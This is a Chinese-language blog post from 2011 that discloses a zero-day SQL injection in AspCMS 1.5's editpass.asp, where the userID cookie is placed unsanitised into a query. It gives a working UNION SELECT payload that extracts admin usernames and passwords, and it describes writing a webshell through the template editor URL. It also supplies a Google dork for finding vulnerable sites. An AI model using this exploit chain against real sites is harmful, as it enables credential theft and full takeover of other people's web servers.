Aspcms 稳定版1.5 0day

2011, December 3, 1:45 PM. 漏洞分析
Submitted by admin

Author: Virushack

Blog: http://virushack.org

From:www.v5script.org

漏洞文件:editpass.asp

漏洞代码:

  1. Dim   linkman  gender  phone  mobile  email  qq  address  postcode 
  2. if   isnul  rCookie  “loginstatus”   ))   then   wCookie  “loginstatus”   0  
  3. if   rCookie  “loginstatus”   )=  1     then  
  4. set   rsObj  conn  Exec   “select * from aspcms_Users where UserID=” & trim  rCookie  “userID”   )),  “r1″ ) 
  5. 直接通过rCookie 取得userid带入查询.

再看看 rcookie函数的处理

  1. ‘读cookies
  2. Function rCookie(cookieName)
  3. rCookie=request.cookies(cookieName)
  4. End Function

直接通过cookies取得

利用:
注册个帐号让 loginstatus不为空
然后 cookies注入 userID 不管你手注还是工具 都行 我这是用火狐的cookies插件

Exploit:UNION SELECT 1,2,3,4,5,6,username,adminpassword,9,10,11,12,13,14,15,16,17,18,19,20,21,22 from Aspcms_admins
效果图:

大小: 8.29 K
尺寸: 300 x 95
浏览: 509 次
点击打开新窗口浏览全图

后台拿shell 就更简单了  插一句话什么都行  我这就用最稳当的方法

http://127.0.0.1/admin/_Style/AspCms_TemplateEdit.asp?filename=a.asp

大小: 9.23 K
尺寸: 300 x 216
浏览: 438 次
点击打开新窗口浏览全图

http://127.0.0.1/Templates/default/html/a.asp

Google Dork: Powered by AspCms v1.5

Tags: aspcms

« 上一篇 | 下一篇 »

只显示10条记录相关文章
aspcms2.1.4 GBK版注入漏洞 (浏览: 16267, 评论: 0)
aspcms企业建站系统0day 2.0以上通杀 (浏览: 21172, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
发表评论

评论内容 (必填):